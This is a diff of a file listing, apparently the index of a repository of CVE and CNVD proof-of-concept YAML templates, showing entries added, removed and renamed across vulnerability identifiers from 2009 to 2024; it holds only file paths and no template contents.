./poc/cve/CVE-2021-29442.yaml @@ -10352,6 +10348,7 @@ ./poc/cve/CVE-2021-29622.yaml ./poc/cve/CVE-2021-29625.yaml ./poc/cve/CVE-2021-3002.yaml +./poc/cve/CVE-2021-30049.yaml ./poc/cve/CVE-2021-30128.yaml ./poc/cve/CVE-2021-30151.yaml ./poc/cve/CVE-2021-3017.yaml @@ -10381,9 +10378,10 @@ ./poc/cve/CVE-2021-31693.yaml ./poc/cve/CVE-2021-31755.yaml ./poc/cve/CVE-2021-31800.yaml +./poc/cve/CVE-2021-31805.yaml ./poc/cve/CVE-2021-31856.yaml -./poc/cve/CVE-2021-31862.yaml ./poc/cve/CVE-2021-32030.yaml +./poc/cve/CVE-2021-32172.yaml ./poc/cve/CVE-2021-3223.yaml ./poc/cve/CVE-2021-32305.yaml ./poc/cve/CVE-2021-3239.yaml @@ -10396,7 +10394,6 @@ ./poc/cve/CVE-2021-32853.yaml ./poc/cve/CVE-2021-3293.yaml ./poc/cve/CVE-2021-3297.yaml -./poc/cve/CVE-2021-33044.yaml ./poc/cve/CVE-2021-33221.yaml ./poc/cve/CVE-2021-33357.yaml ./poc/cve/CVE-2021-33544.yaml @@ -10473,12 +10470,8 @@ ./poc/cve/CVE-2021-35488.yaml ./poc/cve/CVE-2021-35587.yaml ./poc/cve/CVE-2021-3577.yaml -./poc/cve/CVE-2021-36260.yaml -./poc/cve/CVE-2021-36356.yaml ./poc/cve/CVE-2021-36380.yaml -./poc/cve/CVE-2021-36450.yaml ./poc/cve/CVE-2021-3654.yaml -./poc/cve/CVE-2021-36748.yaml ./poc/cve/CVE-2021-36749.yaml ./poc/cve/CVE-2021-36821.yaml ./poc/cve/CVE-2021-36823.yaml @@ -10556,6 +10549,7 @@ ./poc/cve/CVE-2021-37305.yaml ./poc/cve/CVE-2021-37538.yaml ./poc/cve/CVE-2021-37573.yaml +./poc/cve/CVE-2021-37580.yaml ./poc/cve/CVE-2021-37597.yaml ./poc/cve/CVE-2021-37598.yaml ./poc/cve/CVE-2021-37699.yaml @@ -10563,7 +10557,6 @@ ./poc/cve/CVE-2021-37704.yaml ./poc/cve/CVE-2021-37833-1.yaml ./poc/cve/CVE-2021-37833.yaml -./poc/cve/CVE-2021-37859.yaml ./poc/cve/CVE-2021-38312.yaml ./poc/cve/CVE-2021-38314.yaml ./poc/cve/CVE-2021-38315.yaml @@ -10613,7 +10606,6 @@ ./poc/cve/CVE-2021-38359.yaml ./poc/cve/CVE-2021-38360.yaml ./poc/cve/CVE-2021-38361.yaml -./poc/cve/CVE-2021-38540.yaml ./poc/cve/CVE-2021-38647.yaml ./poc/cve/CVE-2021-38702.yaml ./poc/cve/CVE-2021-38751.yaml @@ -10626,6 +10618,7 @@ ./poc/cve/CVE-2021-39201.yaml ./poc/cve/CVE-2021-39202.yaml ./poc/cve/CVE-2021-39203.yaml +./poc/cve/CVE-2021-39211.yaml ./poc/cve/CVE-2021-39226.yaml ./poc/cve/CVE-2021-39308.yaml ./poc/cve/CVE-2021-39309.yaml @@ -10675,6 +10668,8 @@ ./poc/cve/CVE-2021-39357.yaml ./poc/cve/CVE-2021-39433.yaml ./poc/cve/CVE-2021-39501.yaml +./poc/cve/CVE-2021-40149.yaml +./poc/cve/CVE-2021-40150.yaml ./poc/cve/CVE-2021-40247.yaml ./poc/cve/CVE-2021-40323.yaml ./poc/cve/CVE-2021-40438.yaml @@ -10701,6 +10696,7 @@ ./poc/cve/CVE-2021-41291.yaml ./poc/cve/CVE-2021-41293.yaml ./poc/cve/CVE-2021-4134.yaml +./poc/cve/CVE-2021-41349.yaml ./poc/cve/CVE-2021-41381.yaml ./poc/cve/CVE-2021-41432.yaml ./poc/cve/CVE-2021-41460.yaml @@ -10713,7 +10709,9 @@ ./poc/cve/CVE-2021-41773.yaml ./poc/cve/CVE-2021-41826.yaml ./poc/cve/CVE-2021-41836.yaml +./poc/cve/CVE-2021-41878.yaml ./poc/cve/CVE-2021-4191.yaml +./poc/cve/CVE-2021-41951.yaml ./poc/cve/CVE-2021-42013.yaml ./poc/cve/CVE-2021-42063.yaml ./poc/cve/CVE-2021-42071.yaml @@ -10738,6 +10736,7 @@ ./poc/cve/CVE-2021-42547.yaml ./poc/cve/CVE-2021-42548.yaml ./poc/cve/CVE-2021-42549.yaml +./poc/cve/CVE-2021-42551.yaml ./poc/cve/CVE-2021-42565.yaml ./poc/cve/CVE-2021-42566.yaml ./poc/cve/CVE-2021-42567.yaml @@ -10841,6 +10840,7 @@ ./poc/cve/CVE-2021-4408.yaml ./poc/cve/CVE-2021-4409.yaml ./poc/cve/CVE-2021-4410.yaml +./poc/cve/CVE-2021-44103.yaml ./poc/cve/CVE-2021-4411.yaml ./poc/cve/CVE-2021-4412.yaml ./poc/cve/CVE-2021-4413.yaml @@ -10867,7 +10867,6 @@ ./poc/cve/CVE-2021-4436.yaml ./poc/cve/CVE-2021-44427.yaml ./poc/cve/CVE-2021-44451.yaml -./poc/cve/CVE-2021-44515.yaml ./poc/cve/CVE-2021-44521.yaml ./poc/cve/CVE-2021-44528.yaml ./poc/cve/CVE-2021-44529.yaml @@ -10880,7 +10879,6 @@ ./poc/cve/CVE-2021-45046.yaml ./poc/cve/CVE-2021-45092.yaml ./poc/cve/CVE-2021-45232.yaml -./poc/cve/CVE-2021-45380.yaml ./poc/cve/CVE-2021-45382.yaml ./poc/cve/CVE-2021-45422.yaml ./poc/cve/CVE-2021-45729.yaml @@ -10893,11 +10891,10 @@ ./poc/cve/CVE-2021-46379.yaml ./poc/cve/CVE-2021-46381.yaml ./poc/cve/CVE-2021-46387.yaml +./poc/cve/CVE-2021-46417.yaml ./poc/cve/CVE-2021-46418.yaml ./poc/cve/CVE-2021-46419.yaml ./poc/cve/CVE-2021-46422(2).yaml -./poc/cve/CVE-2021-46422.yaml -./poc/cve/CVE-2021-46424.yaml ./poc/cve/CVE-2021-46704.yaml ./poc/cve/CVE-2021-46743.yaml ./poc/cve/CVE-2021-46780.yaml @@ -11032,7 +11029,6 @@ ./poc/cve/CVE-2022-0535.yaml ./poc/cve/CVE-2022-0537.yaml ./poc/cve/CVE-2022-0541.yaml -./poc/cve/CVE-2022-0543.yaml ./poc/cve/CVE-2022-0590.yaml ./poc/cve/CVE-2022-0591.yaml ./poc/cve/CVE-2022-0592.yaml @@ -11065,7 +11061,6 @@ ./poc/cve/CVE-2022-0657.yaml ./poc/cve/CVE-2022-0658.yaml ./poc/cve/CVE-2022-0659.yaml -./poc/cve/CVE-2022-0660.yaml ./poc/cve/CVE-2022-0661.yaml ./poc/cve/CVE-2022-0662.yaml ./poc/cve/CVE-2022-0663.yaml @@ -11132,7 +11127,6 @@ ./poc/cve/CVE-2022-0864.yaml ./poc/cve/CVE-2022-0867.yaml ./poc/cve/CVE-2022-0869.yaml -./poc/cve/CVE-2022-0870.yaml ./poc/cve/CVE-2022-0873.yaml ./poc/cve/CVE-2022-0874.yaml ./poc/cve/CVE-2022-0875.yaml @@ -11150,7 +11144,6 @@ ./poc/cve/CVE-2022-0914.yaml ./poc/cve/CVE-2022-0919.yaml ./poc/cve/CVE-2022-0920.yaml -./poc/cve/CVE-2022-0921.yaml ./poc/cve/CVE-2022-0948.yaml ./poc/cve/CVE-2022-0949.yaml ./poc/cve/CVE-2022-0952.yaml @@ -11177,6 +11170,7 @@ ./poc/cve/CVE-2022-1028.yaml ./poc/cve/CVE-2022-1029.yaml ./poc/cve/CVE-2022-1037.yaml +./poc/cve/CVE-2022-1040.yaml ./poc/cve/CVE-2022-1046.yaml ./poc/cve/CVE-2022-1047.yaml ./poc/cve/CVE-2022-1051.yaml @@ -11510,12 +11504,12 @@ ./poc/cve/CVE-2022-2118.yaml ./poc/cve/CVE-2022-2123.yaml ./poc/cve/CVE-2022-2133.yaml -./poc/cve/CVE-2022-21371.yaml ./poc/cve/CVE-2022-2144.yaml ./poc/cve/CVE-2022-21445.yaml ./poc/cve/CVE-2022-2146.yaml ./poc/cve/CVE-2022-2148.yaml ./poc/cve/CVE-2022-2149.yaml +./poc/cve/CVE-2022-21500.yaml ./poc/cve/CVE-2022-2151.yaml ./poc/cve/CVE-2022-2152.yaml ./poc/cve/CVE-2022-21587.yaml @@ -11653,8 +11647,8 @@ ./poc/cve/CVE-2022-2411.yaml ./poc/cve/CVE-2022-2412.yaml ./poc/cve/CVE-2022-24124.yaml +./poc/cve/CVE-2022-24129.yaml ./poc/cve/CVE-2022-2413.yaml -./poc/cve/CVE-2022-24181.yaml ./poc/cve/CVE-2022-24223.yaml ./poc/cve/CVE-2022-2423.yaml ./poc/cve/CVE-2022-2424.yaml @@ -11695,7 +11689,7 @@ ./poc/cve/CVE-2022-2473.yaml ./poc/cve/CVE-2022-24775.yaml ./poc/cve/CVE-2022-24816.yaml -./poc/cve/CVE-2022-2486.yaml +./poc/cve/CVE-2022-2487.yaml ./poc/cve/CVE-2022-24900.yaml ./poc/cve/CVE-2022-24990.yaml ./poc/cve/CVE-2022-25084.yaml @@ -11775,7 +11769,6 @@ ./poc/cve/CVE-2022-26134.yaml ./poc/cve/CVE-2022-26135.yaml ./poc/cve/CVE-2022-26138 .yaml -./poc/cve/CVE-2022-26138.yaml ./poc/cve/CVE-2022-26143.yaml ./poc/cve/CVE-2022-26148.yaml ./poc/cve/CVE-2022-26233.yaml @@ -11785,6 +11778,7 @@ ./poc/cve/CVE-2022-2629.yaml ./poc/cve/CVE-2022-2633.yaml ./poc/cve/CVE-2022-2635.yaml +./poc/cve/CVE-2022-26352.yaml ./poc/cve/CVE-2022-26366.yaml ./poc/cve/CVE-2022-26375.yaml ./poc/cve/CVE-2022-2638.yaml @@ -11841,7 +11835,7 @@ ./poc/cve/CVE-2022-2799.yaml ./poc/cve/CVE-2022-28023.yaml ./poc/cve/CVE-2022-28032.yaml -./poc/cve/CVE-2022-28079.yaml +./poc/cve/CVE-2022-28080.yaml ./poc/cve/CVE-2022-28090.yaml ./poc/cve/CVE-2022-28221.yaml ./poc/cve/CVE-2022-28222.yaml @@ -11867,6 +11861,7 @@ ./poc/cve/CVE-2022-29006.yaml ./poc/cve/CVE-2022-29009.yaml ./poc/cve/CVE-2022-29013.yaml +./poc/cve/CVE-2022-29014.yaml ./poc/cve/CVE-2022-2903.yaml ./poc/cve/CVE-2022-2912.yaml ./poc/cve/CVE-2022-2913.yaml @@ -11874,7 +11869,6 @@ ./poc/cve/CVE-2022-2926.yaml ./poc/cve/CVE-2022-29272.yaml ./poc/cve/CVE-2022-29298.yaml -./poc/cve/CVE-2022-29299.yaml ./poc/cve/CVE-2022-29303.yaml ./poc/cve/CVE-2022-2933.yaml ./poc/cve/CVE-2022-2934.yaml @@ -11937,11 +11931,11 @@ ./poc/cve/CVE-2022-29453.yaml ./poc/cve/CVE-2022-29454.yaml ./poc/cve/CVE-2022-29455.yaml +./poc/cve/CVE-2022-29464.yaml ./poc/cve/CVE-2022-29476.yaml ./poc/cve/CVE-2022-29489.yaml ./poc/cve/CVE-2022-29495.yaml ./poc/cve/CVE-2022-29499.yaml -./poc/cve/CVE-2022-29548.yaml ./poc/cve/CVE-2022-2958.yaml ./poc/cve/CVE-2022-2981.yaml ./poc/cve/CVE-2022-2983.yaml @@ -11953,6 +11947,7 @@ ./poc/cve/CVE-2022-3026.yaml ./poc/cve/CVE-2022-30337.yaml ./poc/cve/CVE-2022-3036.yaml +./poc/cve/CVE-2022-30489.yaml ./poc/cve/CVE-2022-30513.yaml ./poc/cve/CVE-2022-30514.yaml ./poc/cve/CVE-2022-30525(2).yaml @@ -11986,6 +11981,7 @@ ./poc/cve/CVE-2022-3135.yaml ./poc/cve/CVE-2022-3136.yaml ./poc/cve/CVE-2022-3137.yaml +./poc/cve/CVE-2022-31373.yaml ./poc/cve/CVE-2022-3139.yaml ./poc/cve/CVE-2022-3141.yaml ./poc/cve/CVE-2022-3144.yaml @@ -11996,7 +11992,6 @@ ./poc/cve/CVE-2022-3151.yaml ./poc/cve/CVE-2022-3154.yaml ./poc/cve/CVE-2022-31656.yaml -./poc/cve/CVE-2022-31793.yaml ./poc/cve/CVE-2022-31798.yaml ./poc/cve/CVE-2022-3180.yaml ./poc/cve/CVE-2022-31845.yaml @@ -12009,11 +12004,14 @@ ./poc/cve/CVE-2022-31982.yaml ./poc/cve/CVE-2022-31984.yaml ./poc/cve/CVE-2022-32007.yaml -./poc/cve/CVE-2022-32028.yaml +./poc/cve/CVE-2022-32015.yaml +./poc/cve/CVE-2022-32022.yaml +./poc/cve/CVE-2022-32025.yaml ./poc/cve/CVE-2022-3206.yaml ./poc/cve/CVE-2022-3207.yaml ./poc/cve/CVE-2022-3208.yaml ./poc/cve/CVE-2022-3209.yaml +./poc/cve/CVE-2022-32159.yaml ./poc/cve/CVE-2022-32195.yaml ./poc/cve/CVE-2022-3220.yaml ./poc/cve/CVE-2022-3227.yaml @@ -12041,8 +12039,8 @@ ./poc/cve/CVE-2022-3302.yaml ./poc/cve/CVE-2022-33098.yaml ./poc/cve/CVE-2022-33107.yaml -./poc/cve/CVE-2022-33119.yaml ./poc/cve/CVE-2022-33142.yaml +./poc/cve/CVE-2022-33174.yaml ./poc/cve/CVE-2022-33177.yaml ./poc/cve/CVE-2022-33191.yaml ./poc/cve/CVE-2022-33198.yaml @@ -12086,7 +12084,6 @@ ./poc/cve/CVE-2022-34045.yaml ./poc/cve/CVE-2022-34046.yaml ./poc/cve/CVE-2022-34047.yaml -./poc/cve/CVE-2022-34049.yaml ./poc/cve/CVE-2022-3408.yaml ./poc/cve/CVE-2022-34093.yaml ./poc/cve/CVE-2022-34094.yaml @@ -12147,6 +12144,7 @@ ./poc/cve/CVE-2022-3538.yaml ./poc/cve/CVE-2022-3539.yaml ./poc/cve/CVE-2022-35405.yaml +./poc/cve/CVE-2022-35416.yaml ./poc/cve/CVE-2022-35493.yaml ./poc/cve/CVE-2022-3558.yaml ./poc/cve/CVE-2022-35653.yaml @@ -12452,6 +12450,7 @@ ./poc/cve/CVE-2022-40632.yaml ./poc/cve/CVE-2022-40671.yaml ./poc/cve/CVE-2022-40672.yaml +./poc/cve/CVE-2022-40684.yaml ./poc/cve/CVE-2022-40686.yaml ./poc/cve/CVE-2022-40687.yaml ./poc/cve/CVE-2022-40692.yaml @@ -18484,6 +18483,7 @@ ./poc/cve/CVE-2024-22161.yaml ./poc/cve/CVE-2024-22162.yaml ./poc/cve/CVE-2024-22163.yaml +./poc/cve/CVE-2024-2220.yaml ./poc/cve/CVE-2024-2222.yaml ./poc/cve/CVE-2024-2226.yaml ./poc/cve/CVE-2024-22282.yaml @@ -18791,6 +18791,7 @@ ./poc/cve/CVE-2024-2655.yaml ./poc/cve/CVE-2024-2656.yaml ./poc/cve/CVE-2024-2661.yaml +./poc/cve/CVE-2024-2662.yaml ./poc/cve/CVE-2024-2663.yaml ./poc/cve/CVE-2024-2664.yaml ./poc/cve/CVE-2024-2665.yaml @@ -19460,6 +19461,7 @@ ./poc/cve/CVE-2024-31435.yaml ./poc/cve/CVE-2024-3161.yaml ./poc/cve/CVE-2024-3162.yaml +./poc/cve/CVE-2024-31621.yaml ./poc/cve/CVE-2024-3167.yaml ./poc/cve/CVE-2024-31857.yaml ./poc/cve/CVE-2024-3188.yaml @@ -19560,6 +19562,7 @@ ./poc/cve/CVE-2024-3235.yaml ./poc/cve/CVE-2024-3237.yaml ./poc/cve/CVE-2024-3239.yaml +./poc/cve/CVE-2024-32399.yaml ./poc/cve/CVE-2024-3240.yaml ./poc/cve/CVE-2024-3241.yaml ./poc/cve/CVE-2024-32428.yaml @@ -20020,6 +20023,7 @@ ./poc/cve/CVE-2024-3517.yaml ./poc/cve/CVE-2024-3520.yaml ./poc/cve/CVE-2024-3546.yaml +./poc/cve/CVE-2024-3547.yaml ./poc/cve/CVE-2024-3550.yaml ./poc/cve/CVE-2024-3553.yaml ./poc/cve/CVE-2024-3554.yaml @@ -20079,6 +20083,7 @@ ./poc/cve/CVE-2024-3809.yaml ./poc/cve/CVE-2024-3818.yaml ./poc/cve/CVE-2024-3819.yaml +./poc/cve/CVE-2024-3828.yaml ./poc/cve/CVE-2024-3831.yaml ./poc/cve/CVE-2024-3849.yaml ./poc/cve/CVE-2024-3867.yaml @@ -20095,12 +20100,16 @@ ./poc/cve/CVE-2024-3897.yaml ./poc/cve/CVE-2024-3915.yaml ./poc/cve/CVE-2024-3916.yaml +./poc/cve/CVE-2024-3917.yaml +./poc/cve/CVE-2024-3918.yaml +./poc/cve/CVE-2024-3920.yaml ./poc/cve/CVE-2024-3923.yaml ./poc/cve/CVE-2024-3929.yaml ./poc/cve/CVE-2024-3936.yaml ./poc/cve/CVE-2024-3942.yaml ./poc/cve/CVE-2024-3952.yaml ./poc/cve/CVE-2024-3954.yaml +./poc/cve/CVE-2024-3956.yaml ./poc/cve/CVE-2024-3957.yaml ./poc/cve/CVE-2024-3962.yaml ./poc/cve/CVE-2024-3974.yaml @@ -20118,6 +20127,7 @@ ./poc/cve/CVE-2024-4035.yaml ./poc/cve/CVE-2024-4036.yaml ./poc/cve/CVE-2024-4038.yaml +./poc/cve/CVE-2024-4039.yaml ./poc/cve/CVE-2024-4041.yaml ./poc/cve/CVE-2024-4077.yaml ./poc/cve/CVE-2024-4082.yaml @@ -20142,9 +20152,15 @@ ./poc/cve/CVE-2024-4233.yaml ./poc/cve/CVE-2024-4234.yaml ./poc/cve/CVE-2024-4265.yaml +./poc/cve/CVE-2024-4275.yaml +./poc/cve/CVE-2024-4277.yaml +./poc/cve/CVE-2024-4280.yaml ./poc/cve/CVE-2024-4281.yaml +./poc/cve/CVE-2024-4289.yaml +./poc/cve/CVE-2024-4290.yaml ./poc/cve/CVE-2024-4312.yaml ./poc/cve/CVE-2024-4314.yaml +./poc/cve/CVE-2024-4316.yaml ./poc/cve/CVE-2024-4324.yaml ./poc/cve/CVE-2024-4334.yaml ./poc/cve/CVE-2024-4335.yaml @@ -20154,12 +20170,20 @@ ./poc/cve/CVE-2024-4383.yaml ./poc/cve/CVE-2024-4386.yaml ./poc/cve/CVE-2024-4393.yaml +./poc/cve/CVE-2024-4397.yaml +./poc/cve/CVE-2024-4398.yaml ./poc/cve/CVE-2024-4411.yaml ./poc/cve/CVE-2024-4433.yaml +./poc/cve/CVE-2024-4434.yaml ./poc/cve/CVE-2024-4439.yaml ./poc/cve/CVE-2024-4441.yaml +./poc/cve/CVE-2024-4444.yaml ./poc/cve/CVE-2024-4446.yaml +./poc/cve/CVE-2024-4448.yaml +./poc/cve/CVE-2024-4449.yaml ./poc/cve/CVE-2024-4463.yaml +./poc/cve/CVE-2024-4481.yaml +./poc/cve/CVE-2024-4490.yaml ./poc/cve/CVE-2024-4529.yaml ./poc/cve/CVE-2024-4530.yaml ./poc/cve/CVE-2024-4531.yaml @@ -20184,7 +20208,7 @@ ./poc/cve/apache-kylin-unauth-cve-2020-13937.yml ./poc/cve/apache-ofbiz-cve-2018-8033-xxe.yml ./poc/cve/apache-ofbiz-cve-2020-9496-xml-deserialization.yml -./poc/cve/apache-solr-log4j-cve-2021-44228.yaml +./poc/cve/apache-solr-log4j-CVE-2021-44228.yaml ./poc/cve/apache-tomcat-CVE-2022-34305.yaml ./poc/cve/apache-tomcat-cve-2022-34305.yaml ./poc/cve/bash-cve-2014-6271.yml @@ -20233,6 +20257,7 @@ ./poc/cve/cnvd-2020-67113-1072.yaml ./poc/cve/cnvd-2020-68596-1073.yaml ./poc/cve/cnvd-2020-68596-1074.yaml +./poc/cve/cnvd-2020-68596-1075.yaml ./poc/cve/cnvd-2020-68596-1076.yaml ./poc/cve/cnvd-2021-01627.yaml ./poc/cve/cnvd-2021-01931-1077.yaml @@ -20253,6 +20278,7 @@ ./poc/cve/cnvd-2021-15822-1093.yaml ./poc/cve/cnvd-2021-15822-1094.yaml ./poc/cve/cnvd-2021-15822-1095.yaml +./poc/cve/cnvd-2021-15824-1096.yaml ./poc/cve/cnvd-2021-15824-1097.yaml ./poc/cve/cnvd-2021-17369-1098.yaml ./poc/cve/cnvd-2021-17369-1099.yaml @@ -20415,6 +20441,7 @@ ./poc/cve/cve-2009-1151-1416.yaml ./poc/cve/cve-2009-1151-1417.yaml ./poc/cve/cve-2009-1151-1418.yaml +./poc/cve/cve-2009-1151.yaml ./poc/cve/cve-2009-1496-1419.yaml ./poc/cve/cve-2009-1496-1420.yaml ./poc/cve/cve-2009-1496-1421.yaml @@ -21537,6 +21564,7 @@ ./poc/cve/cve-2015-2807-2499.yaml ./poc/cve/cve-2015-2807-2500.yaml ./poc/cve/cve-2015-2807-2501.yaml +./poc/cve/cve-2015-3224.yaml ./poc/cve/cve-2015-3306-2502.yaml ./poc/cve/cve-2015-3306-2503.yaml ./poc/cve/cve-2015-3306-2504.yaml @@ -21586,7 +21614,6 @@ ./poc/cve/cve-2015-5354-2548.yaml ./poc/cve/cve-2015-5354-2549.yaml ./poc/cve/cve-2015-5354-2550.yaml -./poc/cve/cve-2015-5354.yaml ./poc/cve/cve-2015-5461-2551.yaml ./poc/cve/cve-2015-5461-2552.yaml ./poc/cve/cve-2015-5461-2553.yaml @@ -21868,6 +21895,7 @@ ./poc/cve/cve-2017-0929-2825.yaml ./poc/cve/cve-2017-0929-2826.yaml ./poc/cve/cve-2017-0929.yaml +./poc/cve/cve-2017-1000027.yaml ./poc/cve/cve-2017-1000028-2827.yaml ./poc/cve/cve-2017-1000028-2828.yaml ./poc/cve/cve-2017-1000028-2829.yaml @@ -22305,7 +22333,6 @@ ./poc/cve/cve-2018-10201-3165.yaml ./poc/cve/cve-2018-10201-3166.yaml ./poc/cve/cve-2018-10201-3167.yaml -./poc/cve/cve-2018-10230.yaml ./poc/cve/cve-2018-10562-3168.yaml ./poc/cve/cve-2018-10562-3169.yaml ./poc/cve/cve-2018-10562-3170.yaml @@ -22328,7 +22355,6 @@ ./poc/cve/cve-2018-10956-3187.yaml ./poc/cve/cve-2018-10956-3188.yaml ./poc/cve/cve-2018-11231-3189.yaml -./poc/cve/cve-2018-11231.yaml ./poc/cve/cve-2018-11409-1.yaml ./poc/cve/cve-2018-11409-2.yaml ./poc/cve/cve-2018-11409-3190.yaml @@ -22337,6 +22363,7 @@ ./poc/cve/cve-2018-11409-3193.yaml ./poc/cve/cve-2018-11409-3194.yaml ./poc/cve/cve-2018-11409-3195.yaml +./poc/cve/cve-2018-11510.yaml ./poc/cve/cve-2018-11709-3196.yaml ./poc/cve/cve-2018-11709-3197.yaml ./poc/cve/cve-2018-11709-3198.yaml @@ -22492,11 +22519,9 @@ ./poc/cve/cve-2018-15535-3337.yaml ./poc/cve/cve-2018-15535-3338.yaml ./poc/cve/cve-2018-15535-3339.yaml -./poc/cve/cve-2018-15535.yaml ./poc/cve/cve-2018-15640-3340.yaml ./poc/cve/cve-2018-15640-3341.yaml ./poc/cve/cve-2018-15640-3342.yaml -./poc/cve/cve-2018-15657.yaml ./poc/cve/cve-2018-15745-3343.yaml ./poc/cve/cve-2018-15745-3344.yaml ./poc/cve/cve-2018-15745-3345.yaml @@ -22616,9 +22641,9 @@ ./poc/cve/cve-2018-18778-3458.yaml ./poc/cve/cve-2018-18778-3459.yaml ./poc/cve/cve-2018-18778-3460.yaml -./poc/cve/cve-2018-18778.yaml ./poc/cve/cve-2018-18925-3461.yaml ./poc/cve/cve-2018-18925-3462.yaml +./poc/cve/cve-2018-19136.yaml ./poc/cve/cve-2018-19137.yaml ./poc/cve/cve-2018-19326-3463.yaml ./poc/cve/cve-2018-19326-3464.yaml @@ -22643,14 +22668,14 @@ ./poc/cve/cve-2018-19458-3483.yaml ./poc/cve/cve-2018-19458-3484.yaml ./poc/cve/cve-2018-19458-3485.yaml -./poc/cve/cve-2018-19749.yaml -./poc/cve/cve-2018-19752.yaml +./poc/cve/cve-2018-19751.yaml ./poc/cve/cve-2018-19753-3486.yaml ./poc/cve/cve-2018-19753-3487.yaml ./poc/cve/cve-2018-19753-3488.yaml +./poc/cve/cve-2018-19877(1).yaml ./poc/cve/cve-2018-19892.yaml -./poc/cve/cve-2018-19915.yaml -./poc/cve/cve-2018-20009.yaml +./poc/cve/cve-2018-20009(1).yaml +./poc/cve/cve-2018-20010(1).yaml ./poc/cve/cve-2018-20011(1).yaml ./poc/cve/cve-2018-20062-3489.yaml ./poc/cve/cve-2018-20062-3490.yaml @@ -22737,7 +22762,7 @@ ./poc/cve/cve-2018-5316-3568.yaml ./poc/cve/cve-2018-5316-3569.yaml ./poc/cve/cve-2018-5316-3570.yaml -./poc/cve/cve-2018-5715(1).yaml +./poc/cve/cve-2018-5715.yaml ./poc/cve/cve-2018-6008-3571.yaml ./poc/cve/cve-2018-6008-3572.yaml ./poc/cve/cve-2018-6008-3573.yaml @@ -22870,6 +22895,7 @@ ./poc/cve/cve-2019-1010290-3702.yaml ./poc/cve/cve-2019-10232-3703.yaml ./poc/cve/cve-2019-10232-3704.yaml +./poc/cve/cve-2019-10232-3705.yaml ./poc/cve/cve-2019-10405-3706.yaml ./poc/cve/cve-2019-10405-3707.yaml ./poc/cve/cve-2019-10405-3708.yaml @@ -22914,7 +22940,6 @@ ./poc/cve/cve-2019-11580-3746.yaml ./poc/cve/cve-2019-11580-3747.yaml ./poc/cve/cve-2019-11580-3748.yaml -./poc/cve/cve-2019-11580-3749.yaml ./poc/cve/cve-2019-11581(1).yaml ./poc/cve/cve-2019-11581-3750.yaml ./poc/cve/cve-2019-11581-3751.yaml @@ -22948,7 +22973,7 @@ ./poc/cve/cve-2019-12461-3781.yaml ./poc/cve/cve-2019-12461-3782.yaml ./poc/cve/cve-2019-12461-3783.yaml -./poc/cve/cve-2019-12581(1).yaml +./poc/cve/cve-2019-12581.yaml ./poc/cve/cve-2019-12583(1).yaml ./poc/cve/cve-2019-12583-3784.yaml ./poc/cve/cve-2019-12593-1.yaml @@ -22970,11 +22995,12 @@ ./poc/cve/cve-2019-12725-3799.yaml ./poc/cve/cve-2019-12725-3800.yaml ./poc/cve/cve-2019-12725-3801.yaml -./poc/cve/cve-2019-12962.yaml +./poc/cve/cve-2019-12962(1).yaml ./poc/cve/cve-2019-13101-3802.yaml ./poc/cve/cve-2019-13101-3803.yaml ./poc/cve/cve-2019-13101-3804.yaml ./poc/cve/cve-2019-13101-3805.yaml +./poc/cve/cve-2019-13101-3806.yaml ./poc/cve/cve-2019-13392-3807.yaml ./poc/cve/cve-2019-13392-3808.yaml ./poc/cve/cve-2019-13392-3809.yaml @@ -23134,6 +23160,7 @@ ./poc/cve/cve-2019-17270-3970.yaml ./poc/cve/cve-2019-17270-3971.yaml ./poc/cve/cve-2019-17270-3972.yaml +./poc/cve/cve-2019-17270-3973.yaml ./poc/cve/cve-2019-17270-3974.yaml ./poc/cve/cve-2019-17382-1.yaml ./poc/cve/cve-2019-17382-2.yaml @@ -23169,8 +23196,8 @@ ./poc/cve/cve-2019-17558-4002.yaml ./poc/cve/cve-2019-1821-4003.yaml ./poc/cve/cve-2019-1821-4004.yaml -./poc/cve/cve-2019-18371(1).yaml ./poc/cve/cve-2019-18371-4005.yaml +./poc/cve/cve-2019-18371.yaml ./poc/cve/cve-2019-18393-4006.yaml ./poc/cve/cve-2019-18393-4007.yaml ./poc/cve/cve-2019-18393-4008.yaml @@ -23184,7 +23211,6 @@ ./poc/cve/cve-2019-18394-4017.yaml ./poc/cve/cve-2019-18665-4019.yaml ./poc/cve/cve-2019-18665-4020.yaml -./poc/cve/cve-2019-18665.yaml ./poc/cve/cve-2019-18818-4021.yaml ./poc/cve/cve-2019-18818-4022.yaml ./poc/cve/cve-2019-18818-4023.yaml @@ -23265,11 +23291,11 @@ ./poc/cve/cve-2019-2588-4098.yaml ./poc/cve/cve-2019-2588-4099.yaml ./poc/cve/cve-2019-2588-4100.yaml -./poc/cve/cve-2019-2616(1).yaml ./poc/cve/cve-2019-2616-4101.yaml ./poc/cve/cve-2019-2616-4102.yaml ./poc/cve/cve-2019-2616-4103.yaml ./poc/cve/cve-2019-2616-4104.yaml +./poc/cve/cve-2019-2616.yaml ./poc/cve/cve-2019-2725-4105.yaml ./poc/cve/cve-2019-2725-4106.yaml ./poc/cve/cve-2019-2725-4107.yaml @@ -23280,7 +23306,6 @@ ./poc/cve/cve-2019-2729-4112.yaml ./poc/cve/cve-2019-2729-4113.yaml ./poc/cve/cve-2019-2729-4114.yaml -./poc/cve/cve-2019-2729-4115.yaml ./poc/cve/cve-2019-2767-4116.yaml ./poc/cve/cve-2019-2767-4117.yaml ./poc/cve/cve-2019-2767-4118.yaml @@ -23335,7 +23360,6 @@ ./poc/cve/cve-2019-5418-4165.yaml ./poc/cve/cve-2019-5418-4166.yaml ./poc/cve/cve-2019-5418-4167.yaml -./poc/cve/cve-2019-5418-4168.yaml ./poc/cve/cve-2019-5418-4169.yaml ./poc/cve/cve-2019-5418-4170.yaml ./poc/cve/cve-2019-5418-4171.yaml @@ -23346,12 +23370,12 @@ ./poc/cve/cve-2019-6112-4176.yaml ./poc/cve/cve-2019-6112-4177.yaml ./poc/cve/cve-2019-6112-4178.yaml -./poc/cve/cve-2019-6340(1).yaml ./poc/cve/cve-2019-6340-4179.yaml ./poc/cve/cve-2019-6340-4180.yaml ./poc/cve/cve-2019-6340-4181.yaml ./poc/cve/cve-2019-6340-4182.yaml ./poc/cve/cve-2019-6340-4183.yaml +./poc/cve/cve-2019-6340.yaml ./poc/cve/cve-2019-6715-4184.yaml ./poc/cve/cve-2019-6715-4185.yaml ./poc/cve/cve-2019-6715-4186.yaml @@ -23408,6 +23432,7 @@ ./poc/cve/cve-2019-7609-4237.yaml ./poc/cve/cve-2019-7609-4238.yaml ./poc/cve/cve-2019-7609-4239.yaml +./poc/cve/cve-2019-8442(1).yaml ./poc/cve/cve-2019-8442-4240.yaml ./poc/cve/cve-2019-8442-4241.yaml 